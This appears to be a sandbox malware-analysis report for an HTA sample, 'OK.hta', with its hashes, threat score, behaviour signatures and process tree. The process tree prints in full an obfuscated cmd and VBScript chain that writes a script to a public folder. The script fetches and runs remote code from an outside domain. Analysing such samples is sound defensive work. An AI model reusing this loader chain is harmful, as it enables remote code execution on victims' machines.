Overview

overview

8

Static

static

1

OK.hta

windows7-x64

8

OK.hta

windows10-2004-x64

8

Analysis

  • max time kernel
    444s
  • max time network
    456s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-es
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-eslocale:es-esos:windows10-2004-x64systemwindows
  • submitted
    29-08-2023 18:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    OK.hta

  • Size

    28KB

  • MD5

    352e0ed1b070afa3548c6ca407e9e692

  • SHA1

    488d26262c5b975da64f090e7160b23ae3404ea6

  • SHA256

    76bf3c2ff119a63aafd9c6ebc5fe3710f93ddd86a41b84db89dfc92699a251e8

  • SHA512

    40bf5304daf66d42e4f92a4db9dfd5648d60ca5186c3c869b3d6204d768a47f640f4759cd36bc24381fe1eebae58aa8c195d9abf95f7f7153229a82339a4b360

  • SSDEEP

    768:CKNIAZw4qy4m2ZqlmAb6wUH13ghGiqNn6h:CKNIAZw/V+3i3sGiqNq

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\OK.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2736
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k echo|set /p=^"xsui=".":rNXHT="i":HuQq="g":XPeImd=":":GetO^">C:\\Users\\Public\\tlIMPQ.vbs&echo|set /p=^"bject("sCr"+rNXHT+"pt"+XPeImd+"hT"+"Tps"+XPeImd+"//caradexana"+xsui+"com//"+HuQq+"1")^">>C:\\Users\\Public\\tlIMPQ.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\tlIMPQ.vbs
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3372
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" set /p="xsui=".":rNXHT="i":HuQq="g":XPeImd=":":GetO" 1>C:\\Users\\Public\\tlIMPQ.vbs"
        3⤵
          PID:5100
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo"
          3⤵
            PID:212
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+rNXHT+"pt"+XPeImd+"hT"+"Tps"+XPeImd+"//caradexana"+xsui+"com//"+HuQq+"1")" 1>>C:\\Users\\Public\\tlIMPQ.vbs"
            3⤵
              PID:976
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo"
              3⤵
                PID:4220
              • \??\c:\windows\SysWOW64\cmd.exe
                c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\tlIMPQ.vbs
                3⤵
                • Modifies registry class
                • Suspicious use of WriteProcessMemory
                PID:3156
                • C:\Windows\SysWOW64\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Public\tlIMPQ.vbs"
                  4⤵
                  • Blocklisted process makes network request
                  PID:3700

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Public\tlIMPQ.vbs
            Filesize

            128B

            MD5

            0bafd37d9f6d05f721776bfc398ec71c

            SHA1

            262a16b7e3fecf1e62c2e0a90230b99609ee48d8

            SHA256

            5483cd0151d1a0fd369d7af3df051a9e0bb753520cb474d3b1b78e306df33fd2

            SHA512

            4db6b24deea197c001ffffe9c4ef13a23b4affd7e7c49512debe4cd51fd951db3e34146dfb30ee9f2506ca29f61d3f55c87c97bae8585828912598b89a798910

            Download Submit

          • C:\Users\Public\tlIMPQ.vbs
            Filesize

            128B

            MD5

            0bafd37d9f6d05f721776bfc398ec71c

            SHA1

            262a16b7e3fecf1e62c2e0a90230b99609ee48d8

            SHA256

            5483cd0151d1a0fd369d7af3df051a9e0bb753520cb474d3b1b78e306df33fd2

            SHA512

            4db6b24deea197c001ffffe9c4ef13a23b4affd7e7c49512debe4cd51fd951db3e34146dfb30ee9f2506ca29f61d3f55c87c97bae8585828912598b89a798910

            Download Submit